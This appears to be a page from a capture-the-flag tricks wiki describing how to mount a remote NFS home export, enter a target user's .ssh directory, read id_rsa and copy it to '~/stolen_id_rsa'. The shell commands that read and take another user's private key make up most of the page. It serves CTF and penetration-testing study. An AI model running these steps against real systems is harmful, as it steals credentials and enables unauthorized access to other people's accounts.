> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-6/credentials/filesystem-search/trick-0360.md).

# Steal SSH Key from Mounted NFS Share

***

To access a user's home directory on an NFS share, you first need to mount the share if it's not already. For example, to mount the `/home` export from `192.168.1.10` to a local directory `/tmp/nfs_share`:

```bash
mkdir /tmp/nfs_share
mount -t nfs 192.168.1.10:/home /tmp/nfs_share -nolock
```

Once the share is mounted, navigate into the target user's home directory. If the target user's directory `/home/user` is mounted at `/tmp/nfs_share/user`, you can access their files directly:

```bash
cd /tmp/nfs_share/user
```

From the user's home directory, you can access sensitive directories like `.ssh`. You can navigate into it and list its contents:

```bash
cd .ssh/
ls -la
```

This allows you to see files like `id_rsa`. You can then access the private key. For example, to view the key directly:

```bash
cat id_rsa
```

Alternatively, from the user's home directory, you can list the contents of their `.ssh` directory and copy the private key (`id_rsa`) to your local machine:

```bash
ls -la .ssh
cp .ssh/id_rsa ~/stolen_id_rsa
```

This is possible provided the NFS share permissions grant you read access to the directory and file.
